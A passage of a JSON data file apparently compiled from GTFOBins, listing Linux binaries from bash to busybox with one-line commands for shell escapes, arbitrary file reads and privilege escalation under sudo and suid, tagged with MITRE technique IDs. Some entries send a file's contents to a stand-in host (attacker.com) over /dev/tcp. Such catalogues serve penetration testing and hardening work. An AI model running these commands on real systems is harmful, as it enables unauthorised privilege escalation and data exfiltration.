context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"bash -p -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bash:upload:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"bash -c 'echo -n \"$(</path/to/input-file)\" >/dev/tcp/attacker.com/12345'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["ksh"]},{"id":"gtfo:bashbug:inherit:0:sudo","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bashbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bashbug:inherit:0:unprivileged","toolId":"gtfo:bashbug","toolName":"bashbug","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"bashbug","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bashbug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:batcat:inherit:0:sudo","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/batcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:batcat:inherit:0:suid","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/batcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:batcat:inherit:0:unprivileged","toolId":"gtfo:batcat","toolName":"batcat","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"batcat --paging always /etc/hosts","description":"`--paging always` can be omitted provided that the output doesn't fit the screen.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/batcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bbot:file-read:0:sudo","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bbot:file-read:0:unprivileged","toolId":"gtfo:bbot","toolName":"bbot","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bbot -d -cy /path/to/input-file","description":"The file is displayed in the debug log.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bc:file-read:0:sudo","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bc:file-read:0:suid","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bc:file-read:0:unprivileged","toolId":"gtfo:bc","toolName":"bc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bc -s /path/to/input-file\nquit","description":"The file content is actually parsed and appears as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:file-read:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:file-read:0:suid","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:file-read:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bconsole -c /path/to/file-input","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:shell:0:sudo","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bconsole:shell:0:unprivileged","toolId":"gtfo:bconsole","toolName":"bconsole","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"bconsole\n@exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bee:inherit:0:sudo","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bee:inherit:0:suid","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bee:inherit:0:unprivileged","toolId":"gtfo:bee","toolName":"bee","name":"inherit ← php","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Download","File Read","File Write","Reverse/Bind Shell","File Upload"],"nativeCategory":["inherit","from:php"],"command":"bee eval '...'","description":"This allows to run PHP code (`...`).\n\nThis must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`), alternatively use the `--root` option.","mitre":["T1059","T1105","T1005","T1565","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bee/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:borg:shell:0:sudo","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/borg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:borg:shell:0:unprivileged","toolId":"gtfo:borg","toolName":"borg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"borg extract @:/::: --rsh \"/bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'\"","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/borg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bpftrace:shell:0:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace --unsafe -e 'BEGIN {system(\"/bin/sh 1<&0\");exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bpftrace:shell:1:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'BEGIN {system(\"/bin/sh 1<&0\");exit()}' >/path/to/temp-file\nbpftrace --unsafe /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bpftrace:shell:2:sudo","toolId":"gtfo:bpftrace","toolName":"bpftrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"bpftrace -c /bin/sh -e 'END {exit()}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bridge:file-read:0:sudo","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bridge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bridge:file-read:0:suid","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bridge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bridge:file-read:0:unprivileged","toolId":"gtfo:bridge","toolName":"bridge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bridge -b /path/to/input-file","description":"Outputs the first line of the file (until the first whitespace) inside an error message to stdandard error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bridge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bundle:inherit:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:inherit:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"bundle help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:inherit:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:inherit:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"touch Gemfile\nbundle console","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:0:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:0:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"BUNDLE_GEMFILE=x bundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:1:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:1:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"touch Gemfile\nbundle exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:2:sudo","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:bundle:shell:2:unprivileged","toolId":"gtfo:bundle","toolName":"bundle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'system(\"/bin/sh\")' >Gemfile\nbundle install","description":"This might run the shell twice, one after the other.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bundle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["bundler"]},{"id":"gtfo:busctl:inherit:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:inherit:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:inherit:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"busctl --show-machine","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:0:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:0:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:0:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:1:sudo","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:1:suid","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busctl:shell:1:unprivileged","toolId":"gtfo:busctl","toolName":"busctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← ash","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Execution"],"nativeCategory":["inherit","from:ash"],"command":"busybox ash","mitre":["T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:1:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:1:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 